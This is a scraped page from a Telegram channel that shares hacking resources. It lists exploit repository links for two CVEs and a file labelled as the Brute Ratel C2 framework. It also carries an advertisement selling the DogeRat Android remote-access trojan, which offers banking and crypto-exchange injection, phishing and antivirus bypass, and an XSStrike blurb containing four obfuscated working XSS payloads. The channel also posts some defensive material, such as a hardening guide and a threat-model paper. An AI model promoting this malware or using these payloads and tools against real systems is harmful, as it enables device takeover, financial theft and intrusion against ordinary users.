CYBER TRICKS ZONE ๐Ÿ‡ฎ๐Ÿ‡ณ
3.71K subscribers
815 photos
252 videos
662 files
2.74K links
This channel/community aims to provide free courses related to programming,web development, cyber security, ethical hacking and many more tech related stuff and news #programming, #coding, #ethicalhacking #cybersecurity. About: @about_cybertrickszone
Download Telegram
Web Security Academy Series Course.zip.001
1.9 GB
Web Security Academy Series Course.zip.001
Web Security Academy Series Course.zip.002
1.9 GB
Web Security Academy Series Course.zip.002
Web Security Academy Series Course.zip.003
1.9 GB
Web Security Academy Series Course.zip.003
Web Security Academy Series Course.zip.004
955.3 MB
Web Security Academy Series Course.zip.004
#Threat_Research
1. OAuth Account Takeover:
exploitation of OAuth account affecting providers and TikTok/Reddit/Samsung Mail
https://blog.ostorlab.co/one-scheme-to-rule-them-all.html
2. WPS WebShape vulnerability and exploitation analysis
https://paper.seebug.org/3055
an_ace_up_the_sleeve.pdf
5.7 MB
#Offensive_security
"An ACE Up the Sleeve: Designing Active Directory DACL Backdoors", 2018.
#OpSec
#Red_Team_Tactics
1. Stealth redirector for red team operation security
https://github.com/D00Movenok/BounceBack
2. Collection of OPSEC Tradecraft/TTPs for Red Team Ops
https://github.com/WesleyWong420/OPSEC-Tradecraft
#exploit
1. CVE-2023-34051:
VMware Aria Operations for Logs - authentication bypass
https://github.com/horizon3ai/CVE-2023-34051

2. CVE-2023-28432:
MinIO information disclosure
https://github.com/yTxZx/CVE-2023-28432
bruteratel_1.3.tar.gz
103.8 MB
Bruteratel Release v1.3 (Resurgence)
OpenSSF_threat_models.pdf
472.9 KB
#Whitepaper
#Threat_Research
"Threat Model of Enterprise Open Source Supply Chains", 2023.
Cisco_Firepower_Hardening.pdf
1.8 MB
#hardening
"Cisco Firepower Hardening Guide", 2023.
Media is too big
VIEW IN TELEGRAM
DogeRat v5 Demo

- Added
โ€ข Locker - Lock/Unlock Device
โ€ข Open link in browser directly
โ€ข Auto Permission Like CraxRat
โ€ข Bypass all antivirus
โ€ข Crypto exchange Injection
โ€ข Banking Injection
โ€ข Custom phishing
โ€ข Stable in All Android versions
โ€ขAnd All old features ....

Know more :
https://github.com/shivaya-dav/DogeRat-Premium

Buy now @shivaya_dav

Request: please share this in your channel, I will bring free version update soon ๐Ÿ™‚
๐ŸŒŸ XSStrike ๐ŸŒŸ

Advanced XSS Detection Suite

๐Ÿ“
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.

Main Features
โšช๏ธReflected and DOM XSS scanning
โšช๏ธMulti-threaded crawling
โšช๏ธContext analysis
โšช๏ธConfigurable core
โšช๏ธWAF detection & evasion
โšช๏ธOutdated JS lib scanning
โšช๏ธIntelligent payload generator
โšช๏ธHandmade HTML & JavaScript parser
โšช๏ธPowerful fuzzing engine
โšช๏ธBlind XSS support
โšช๏ธHighly researched work-flow
โšช๏ธComplete HTTP support
โšช๏ธBruteforce payloads from a file
โšช๏ธPayload Encoding

๐Ÿ˜ธ Github
Media is too big
VIEW IN TELEGRAM
Get Phone GPS